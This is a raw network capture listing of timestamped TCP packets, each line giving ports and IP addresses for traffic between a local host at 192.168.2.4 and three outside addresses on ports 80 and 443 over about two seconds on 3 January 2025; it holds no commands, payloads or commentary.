                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.612576962 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.614281893 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.614449024 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.619221926 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.899142027 CET44349818188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.899228096 CET49818443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.900738001 CET49818443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.900747061 CET44349818188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.901026964 CET44349818188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.953407049 CET49818443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.954248905 CET49818443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.954283953 CET44349818188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.956188917 CET4980780192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.956511021 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.961163998 CET8049807185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.961285114 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.961373091 CET4980780192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.961410046 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.961673975 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.966420889 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.280384064 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.280446053 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.283616066 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.288403034 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.509392023 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.510432005 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.512278080 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.517102957 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.680953979 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.684264898 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.685461998 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.690246105 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.692323923 CET44349818188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.692410946 CET44349818188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.694267035 CET49818443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.697715998 CET49818443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.697730064 CET44349818188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.698055029 CET49818443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.698060989 CET44349818188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.705809116 CET49826443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.705841064 CET44349826188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.705910921 CET49826443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.706188917 CET49826443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.706203938 CET44349826188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.715579987 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.715595007 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.715662003 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.716902971 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.721694946 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910634041 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910659075 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910670042 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910687923 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910742998 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910753965 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910765886 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910887003 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910887003 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910887003 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910909891 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910922050 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910933971 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910949945 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910970926 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.910995960 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.915736914 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.915781021 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.915791035 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.915843010 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920454979 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920464993 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920471907 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920538902 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920594931 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920605898 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920617104 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920630932 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920641899 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:11.920661926 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040647984 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040674925 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040808916 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040821075 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040844917 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040853977 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040853977 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040858030 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040872097 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040880919 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040888071 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040915012 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.040940046 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.041678905 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.041697979 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.041745901 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042020082 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042032003 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042042017 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042066097 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042095900 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042357922 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042375088 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042387009 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042401075 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042433977 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042495012 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042506933 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042517900 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042534113 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.042563915 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.046416044 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.046428919 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.046439886 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.046473026 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.046509981 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.047144890 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.047157049 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.047167063 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.047194004 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.047218084 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.172352076 CET44349826188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.172414064 CET49826443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.172960043 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.172976017 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.172986984 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.172998905 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173016071 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173041105 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173115015 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173126936 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173137903 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173151970 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173182011 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173218966 CET4981980192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173278093 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173289061 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173304081 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173336029 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173360109 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173434019 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.173480034 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174025059 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174036026 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174046993 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174066067 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174108982 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174312115 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174323082 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174335003 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174346924 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174365997 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174400091 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174772978 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174786091 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174797058 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174808025 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174818039 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174829006 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174865007 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.174936056 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175025940 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175621033 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175708055 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175776958 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175789118 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175801039 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175810099 CET49826443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175820112 CET44349826188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175822973 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175869942 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175923109 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175939083 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.175975084 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176079988 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176115990 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176467896 CET44349826188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176651955 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176664114 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176675081 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176709890 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176733971 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176820993 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176831961 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176842928 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176853895 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176857948 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176888943 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.176919937 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177541971 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177552938 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177565098 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177589893 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177632093 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177692890 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177706003 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177720070 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177731037 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177731991 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177763939 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.177787066 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.178257942 CET49826443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.178287029 CET49826443192.168.2.4188.114.97.3
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.178337097 CET44349826188.114.97.3192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.178455114 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.178503990 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.180387974 CET8049819135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.300740957 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.300755024 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.300796986 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.300827980 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301394939 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301453114 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301465034 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301501036 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301553965 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301589012 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301600933 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301610947 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301636934 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301656961 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301661015 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301662922 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301702023 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301738977 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301790953 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301795006 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301814079 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301834106 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301863909 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301906109 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.301944971 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302042961 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302086115 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302088976 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302100897 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302126884 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302139044 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302309990 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302347898 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302355051 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302361012 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302387953 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302401066 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302475929 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302495003 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302506924 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302535057 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302565098 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302761078 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302779913 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302791119 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302814007 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302839994 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302885056 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302927017 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302957058 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302968979 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.302979946 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.303004026 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.303033113 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.303388119 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.303399086 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.303410053 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.303447962 CET4982080192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.303525925 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.303538084 CET8049820185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:12.303539038 CET4982080192.168.2.4185.215.113.16
